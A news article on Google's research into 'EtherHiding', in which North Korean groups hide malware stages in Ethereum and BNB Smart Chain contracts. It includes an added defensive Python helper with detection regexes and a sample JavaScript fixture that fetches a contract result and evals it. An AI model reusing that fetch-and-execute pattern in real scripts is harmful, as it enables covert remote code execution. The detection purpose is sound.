North Korean Hackers Hide Malware on Ethereum and BNB Smart Chain Blockchains
MOUNTAIN VIEW, CA - Nation-state hackers are increasingly leveraging the decentralized nature of blockchains to conceal and deliver malware, according to new research from Google’s Threat Analysis Group. The groups, including the North Korean-backed UNC5342, are utilizing “EtherHiding” – a technique that stores malicious code within smart contracts on the Ethereum and BNB Smart Chain blockchains – to bypass traditional security measures.
This novel approach allows attackers to distribute malware through publicly accessible, yet difficult-to-trace, transactions. Unlike conventional infrastructure, which can be shut down, blockchains offer a “bulletproof” hosting environment, making it considerably harder for security researchers and law enforcement to disrupt malicious activity. The tactic is particularly concerning given North Korea’s escalating cybercrime operations, already responsible for stealing over $2 billion in cryptocurrency in 2025 alone, according to blockchain analysis firm Elliptic.
The infection process involves a staged deployment of malware. Initial stages, like the JadeSnow downloader used by UNC5342, retrieve later-stage payloads directly from smart contracts on the blockchains. Google researchers noted the unusual practice of UNC5342 utilizing multiple blockchains, potentially indicating compartmentalization within the hacking team. “It is indeed unusual to see a threat actor make use of multiple blockchains for EtherHiding activity; this may indicate operational compartmentalization between teams of North Korean cyber operators,” the researchers observed. “Campaigns frequently leverage EtherHiding’s flexible nature to update the infection chain and shift payload delivery locations. In one transaction, the JADESNOW downloader can switch from fetching a payload on Ethereum to fetching it on the BNB Smart Chain. This switch not only complicates analysis but also leverages lower transaction fees offered by alternate networks.”
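As an added illustration from the analyst's side (this is not code from Google's report or from the actors described above): a small Python helper that recovers the string stored behind a contract read so a retrieved later stage can be examined offline, plus a crude indicator check over script text. The `eth_call` method name, the ABI string layout and the indicator patterns are assumptions about how such downloaders commonly behave, not details taken from the article; the sample data is constructed.

```python
import re

# Constructed sample of what a JSON-RPC eth_call returns for a contract view
# function that returns one ABI-encoded `string`: three 32-byte words, the
# offset of the dynamic data (0x20), its byte length, then the bytes padded
# to a 32-byte boundary. The embedded text here is just "hello-stage".
SAMPLE_RESULT = ("0x" + "00" * 31 + "20" + "00" * 31 + "0b"
                 + "68656c6c6f2d7374616765" + "00" * 21)

def decode_abi_string(result_hex: str) -> str:
    """Decode a single ABI-encoded string from an eth_call result (assumed layout)."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 64:
        raise ValueError("too short for an ABI-encoded string")
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length exceeds returned data")
    return raw[start:start + length].decode("utf-8", errors="replace")

# Indicator patterns (assumed): a read-only contract query, which costs no gas
# and leaves no transaction on chain, followed by hex-to-text decoding and a
# dynamic-execution sink. Any one alone is common; all three together is
# worth a closer look at the script and the contract it reads from.
RPC_METHOD = re.compile(r'["\']eth_call["\']')
HEX_DECODE = re.compile(r'fromCharCode|parseInt\([^)]*16\)|TextDecoder|hexToString')
EXEC_SINK = re.compile(r'\beval\s*\(|new\s+Function\s*\(|\.appendChild\s*\(\s*\w*script')

def etherhiding_indicators(script_text: str) -> list[str]:
    """Return the names of indicator groups present in a piece of script text."""
    hits = []
    if RPC_METHOD.search(script_text):
        hits.append("read-only contract query (eth_call)")
    if HEX_DECODE.search(script_text):
        hits.append("hex-to-text decoding of the RPC result")
    if EXEC_SINK.search(script_text):
        hits.append("dynamic execution of decoded content")
    return hits

# Constructed fixtures: one script fragment showing all three traits, one benign.
SUSPECT_SCRIPT = ('const body = JSON.stringify({jsonrpc:"2.0", method:"eth_call", id:1});\n'
                  'fetch(RPC, {method:"POST", body}).then(r => r.json())'
                  '.then(j => eval(hexToString(j.result)));')
BENIGN_SCRIPT = 'fetch("/api/data").then(r => r.json()).then(j => render(j.items));'

if __name__ == "__main__":
    print(decode_abi_string(SAMPLE_RESULT))
    print(etherhiding_indicators(SUSPECT_SCRIPT), etherhiding_indicators(BENIGN_SCRIPT))
```

Because the switch between Ethereum and BNB Smart Chain described above only changes the RPC endpoint and contract address, the decoding step is the same on either chain, which is why the helper takes the raw result rather than anything chain-specific.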
The financially motivated group UNC5142 has also been observed employing EtherHiding. This trend highlights a growing sophistication in nation-state hacking, moving beyond traditional methods to exploit the inherent characteristics of emerging technologies like blockchain. Security experts anticipate that attackers will continue to refine these techniques, necessitating enhanced monitoring and defensive strategies focused on blockchain activity and smart contract security.